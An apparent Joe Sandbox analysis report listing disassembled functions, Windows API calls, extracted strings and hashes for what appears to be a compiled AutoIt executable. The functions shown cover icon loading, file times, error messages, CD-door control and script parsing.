                                                                                                                            • API ID: BuffCharMessageSendUpper
                                                                                                                            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                            • API String ID: 3974292440-4258414348
                                                                                                                            • Opcode ID: 72fc78a877439c08434a0a518b3f2232dde145f8764cb545ca0a9c08a6ff42ff
                                                                                                                            • Instruction ID: 733fd124609a961a0e4fb942c0cd2cefe83ddca271cfa1594056c0734ec4e49f
                                                                                                                            • Opcode Fuzzy Hash: 72fc78a877439c08434a0a518b3f2232dde145f8764cb545ca0a9c08a6ff42ff
                                                                                                                            • Instruction Fuzzy Hash: B6916B712043419BCB04FF10C852A6EB7E1AF95364F05886CF8966B3A3CB75ED49EB91
                                                                                                                            Function 00F6B7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00F6B8B4
                                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00F66B11,?), ref: 00F6B910
                                                                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F6B949
                                                                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00F6B98C
                                                                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F6B9C3
                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 00F6B9CF
                                                                                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00F6B9DF
                                                                                                                            • DestroyIcon.USER32(?), ref: 00F6B9EE
                                                                                                                            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00F6BA0B
                                                                                                                            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00F6BA17
                                                                                                                              • Part of subcall function 00F02EFD: __wcsicmp_l.LIBCMT ref: 00F02F86
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                                                            • String ID: .dll$.exe$.icl
                                                                                                                            • API String ID: 1212759294-1154884017
                                                                                                                            • Opcode ID: 11cf5b51d5e14532814f8e1a93d1579bfe8ec9228334b1476026fa357e44218a
                                                                                                                            • Instruction ID: 4eedf3a428771ce1809a2567228e7bf0c546276a4e157dfce73cf1180cfcfa0d
                                                                                                                            • Opcode Fuzzy Hash: 11cf5b51d5e14532814f8e1a93d1579bfe8ec9228334b1476026fa357e44218a
                                                                                                                            • Instruction Fuzzy Hash: C661DE71A40219BAEB14DF64DC45FBE7BA8FB08720F10411AFA15D61D1DBB49A81FBA0
                                                                                                                            Function 00F4DC1A Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetLocalTime.KERNEL32(?), ref: 00F4DCDC
                                                                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00F4DCEC
                                                                                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00F4DCF8
                                                                                                                            • __wsplitpath.LIBCMT ref: 00F4DD56
                                                                                                                            • _wcscat.LIBCMT ref: 00F4DD6E
                                                                                                                            • _wcscat.LIBCMT ref: 00F4DD80
                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F4DD95
                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00F4DDA9
                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00F4DDDB
                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00F4DDFC
                                                                                                                            • _wcscpy.LIBCMT ref: 00F4DE08
                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00F4DE47
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                                                            • String ID: *.*
                                                                                                                            • API String ID: 3566783562-438819550
                                                                                                                            • Opcode ID: 96cf6d68ad125bc1844b4f00f8c7752979ffa4781c74c5a1dc305f22fb125807
                                                                                                                            • Instruction ID: 4dbab59fd56076b1fa07c12d2ea2c9c30c1385179958bc5f2c5a38075e6a20b3
                                                                                                                            • Opcode Fuzzy Hash: 96cf6d68ad125bc1844b4f00f8c7752979ffa4781c74c5a1dc305f22fb125807
                                                                                                                            • Instruction Fuzzy Hash: 9761AF725043459FCB10EF20C8849AEB7E8FF89324F04482EF999D7251DB75E945DB92
                                                                                                                            Function 00F49C38 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00F49C7F
                                                                                                                              • Part of subcall function 00EE7DE1: _memmove.LIBCMT ref: 00EE7E22
                                                                                                                            • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00F49CA0
                                                                                                                            • __swprintf.LIBCMT ref: 00F49CF9
                                                                                                                            • __swprintf.LIBCMT ref: 00F49D12
                                                                                                                            • _wprintf.LIBCMT ref: 00F49DB9
                                                                                                                            • _wprintf.LIBCMT ref: 00F49DD7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LoadString__swprintf_wprintf$_memmove
                                                                                                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                                                            • API String ID: 311963372-3080491070
                                                                                                                            • Opcode ID: 0b149e0d3bf851f5188462759fd2807e23f776b7f468efe2e91ee90c10823c40
                                                                                                                            • Instruction ID: f2fe7052f9da1305639c061db19f12982ff84d460250aa3e9e7919b9b2b045a5
                                                                                                                            • Opcode Fuzzy Hash: 0b149e0d3bf851f5188462759fd2807e23f776b7f468efe2e91ee90c10823c40
                                                                                                                            • Instruction Fuzzy Hash: 4E51D172D0420EAADF14EBE1CD46EEEBBB8AF04300F100065F505720A2EB756F49EB61
                                                                                                                            Function 00F4A352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EE9837: __itow.LIBCMT ref: 00EE9862
                                                                                                                              • Part of subcall function 00EE9837: __swprintf.LIBCMT ref: 00EE98AC
                                                                                                                            • CharLowerBuffW.USER32(?,?), ref: 00F4A3CB
                                                                                                                            • GetDriveTypeW.KERNEL32 ref: 00F4A418
                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F4A460
                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F4A497
                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F4A4C5
                                                                                                                              • Part of subcall function 00EE7BCC: _memmove.LIBCMT ref: 00EE7C06
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                            • API String ID: 2698844021-4113822522
                                                                                                                            • Opcode ID: 0fb08e037f4295f0ddde5b5d9507e96f5f34afed3d68b6c2fd655c2bccaea3aa
                                                                                                                            • Instruction ID: da2a4bc407348480d5ca75bdd1d86af7567246da2fad0394d336a0c0cccad03d
                                                                                                                            • Opcode Fuzzy Hash: 0fb08e037f4295f0ddde5b5d9507e96f5f34afed3d68b6c2fd655c2bccaea3aa
                                                                                                                            • Instruction Fuzzy Hash: AF517F715043499FC700EF11C88196EB7E4EF95758F10486DF896A7262DB31ED0ADB42
                                                                                                                            Function 00F3F8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,00F1E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 00F3F8DF
                                                                                                                            • LoadStringW.USER32(00000000,?,00F1E029,00000001), ref: 00F3F8E8
                                                                                                                              • Part of subcall function 00EE7DE1: _memmove.LIBCMT ref: 00EE7E22
                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,00FA5310,?,00000FFF,?,?,00F1E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 00F3F90A
                                                                                                                            • LoadStringW.USER32(00000000,?,00F1E029,00000001), ref: 00F3F90D
                                                                                                                            • __swprintf.LIBCMT ref: 00F3F95D
                                                                                                                            • __swprintf.LIBCMT ref: 00F3F96E
                                                                                                                            • _wprintf.LIBCMT ref: 00F3FA17
                                                                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00F3FA2E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                                                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                            • API String ID: 984253442-2268648507
                                                                                                                            • Opcode ID: db3368753a7458ee0d1da109f73f54632565511843ff03e742ad340c3861dc75
                                                                                                                            • Instruction ID: 195f9afed6fa92e50a209b19ec3a7b23ce98ef5d0bebfc2196516e5be61587ec
                                                                                                                            • Opcode Fuzzy Hash: db3368753a7458ee0d1da109f73f54632565511843ff03e742ad340c3861dc75
                                                                                                                            • Instruction Fuzzy Hash: 18414D72C0424DAACF04FBE1DD86EEEB7B8AF19350F500065B506B6092EA356F49DB61
                                                                                                                            Function 00F1A8CB Relevance: 22.7, APIs: 15, Instructions: 211COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 884005220-0
                                                                                                                            • Opcode ID: c1af9bafa02e0dc6b57d1e8090a9520325e57da4a3de47cbbbe49c759f46b8cb
                                                                                                                            • Instruction ID: edd6601dfe25d8000d863fc6bc395faa12f72a11cbc5eb3cf8cd027bcf4f2575
                                                                                                                            • Opcode Fuzzy Hash: c1af9bafa02e0dc6b57d1e8090a9520325e57da4a3de47cbbbe49c759f46b8cb
                                                                                                                            • Instruction Fuzzy Hash: F16102B2D06205EFDB119F24DC027A977A8EF01770F615119E805A71D1EB389DC1FAA2
                                                                                                                            Function 00F6BA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00F6BA56
                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 00F6BA6D
                                                                                                                            • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00F6BA78
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00F6BA85
                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00F6BA8E
                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00F6BA9D
                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00F6BAA6
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00F6BAAD
                                                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00F6BABE
                                                                                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,00F72CAC,?), ref: 00F6BAD7
                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00F6BAE7
                                                                                                                            • GetObjectW.GDI32(?,00000018,000000FF), ref: 00F6BB0B
                                                                                                                            • CopyImage.USER32(?,00000000,?,?,00002000), ref: 00F6BB36
                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00F6BB5E
                                                                                                                            • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00F6BB74
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3840717409-0
                                                                                                                            • Opcode ID: fcf24d6d2b6b0a5ee99e860a3bb799da03f554eddff15b55031e3040335b9b27
                                                                                                                            • Instruction ID: bf65fad3fd82a47f481423fd50ff474862a2e64b503736446a5e0532f0911f32
                                                                                                                            • Opcode Fuzzy Hash: fcf24d6d2b6b0a5ee99e860a3bb799da03f554eddff15b55031e3040335b9b27
                                                                                                                            • Instruction Fuzzy Hash: FC413A75600208EFDB119FA5EC88EAA7BB8FF89B21F104068F916D7260D7709D45EB60
                                                                                                                            Function 00F4D899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __wsplitpath.LIBCMT ref: 00F4DA10
                                                                                                                            • _wcscat.LIBCMT ref: 00F4DA28
                                                                                                                            • _wcscat.LIBCMT ref: 00F4DA3A
                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F4DA4F
                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00F4DA63
                                                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 00F4DA7B
                                                                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00F4DA95
                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00F4DAA7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                                                            • String ID: *.*
                                                                                                                            • API String ID: 34673085-438819550
                                                                                                                            • Opcode ID: d2acc116c3181035e099deea05df907e7b71cda0906a3faf0bb0cfadaec18916
                                                                                                                            • Instruction ID: 0551f2a1f82b5e53fcbb8dc13cb5ca4fa6f4f8f3eebba77df50196b09b1c8324
                                                                                                                            • Opcode Fuzzy Hash: d2acc116c3181035e099deea05df907e7b71cda0906a3faf0bb0cfadaec18916
                                                                                                                            • Instruction Fuzzy Hash: A181A2729043459FCB64DF64C844A6ABBE4BF89324F18482EFC89D7251E734DD44EB52
                                                                                                                            Function 00F6C1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EE2612: GetWindowLongW.USER32(?,000000EB), ref: 00EE2623
                                                                                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00F6C1FC
                                                                                                                            • GetFocus.USER32 ref: 00F6C20C
                                                                                                                            • GetDlgCtrlID.USER32(00000000), ref: 00F6C217
                                                                                                                            • _memset.LIBCMT ref: 00F6C342
                                                                                                                            • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00F6C36D
                                                                                                                            • GetMenuItemCount.USER32(?), ref: 00F6C38D
                                                                                                                            • GetMenuItemID.USER32(?,00000000), ref: 00F6C3A0
                                                                                                                            • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00F6C3D4
                                                                                                                            • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00F6C41C
                                                                                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00F6C454
                                                                                                                            • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00F6C489
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                                                            • String ID: 0
                                                                                                                            • API String ID: 1296962147-4108050209
                                                                                                                            • Opcode ID: 239ec8bd990bc826419d46fb02b081b99c1ef89ac0786cbb6af1dbdad403ba6f
                                                                                                                            • Instruction ID: 4264a96bc1bd701ce4b83281a7fd825c5313c6646f2a0207c1cecbc318c63600
                                                                                                                            • Opcode Fuzzy Hash: 239ec8bd990bc826419d46fb02b081b99c1ef89ac0786cbb6af1dbdad403ba6f
                                                                                                                            • Instruction Fuzzy Hash: D5817A71609305AFD710CF24D894A7BBBE8FB89724F00492EF9D597291CB70D905EBA2
                                                                                                                            Function 00F5731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetDC.USER32(00000000), ref: 00F5738F
                                                                                                                            • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00F5739B
                                                                                                                            • CreateCompatibleDC.GDI32(?), ref: 00F573A7
                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00F573B4
                                                                                                                            • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00F57408
                                                                                                                            • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00F57444
                                                                                                                            • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00F57468
                                                                                                                            • SelectObject.GDI32(00000006,?), ref: 00F57470
                                                                                                                            • DeleteObject.GDI32(?), ref: 00F57479
                                                                                                                            • DeleteDC.GDI32(00000006), ref: 00F57480
                                                                                                                            • ReleaseDC.USER32(00000000,?), ref: 00F5748B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                            • String ID: (
                                                                                                                            • API String ID: 2598888154-3887548279
                                                                                                                            • Opcode ID: 61af087ceda54d7fa44f133c3be2ee125d85c688839312111285316ec77f9e49
                                                                                                                            • Instruction ID: 9387d67188ff7646fafd4a3aba95392cead3a02c07094deb27c24618ae0c54c2
                                                                                                                            • Opcode Fuzzy Hash: 61af087ceda54d7fa44f133c3be2ee125d85c688839312111285316ec77f9e49
                                                                                                                            • Instruction Fuzzy Hash: 1A514A75904309EFCB14DFA8DC85EAEBBB9EF48320F14842DFA5A97211C771A944EB50
                                                                                                                            Function 00EE6A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00F00957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00EE6B0C,?,00008000), ref: 00F00973
                                                                                                                              • Part of subcall function 00EE4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00EE4743,?,?,00EE37AE,?), ref: 00EE4770
                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00EE6BAD
                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00EE6CFA
                                                                                                                              • Part of subcall function 00EE586D: _wcscpy.LIBCMT ref: 00EE58A5
                                                                                                                              • Part of subcall function 00F0363D: _iswctype.LIBCMT ref: 00F03645
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                                                                            • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                                            • API String ID: 537147316-1018226102
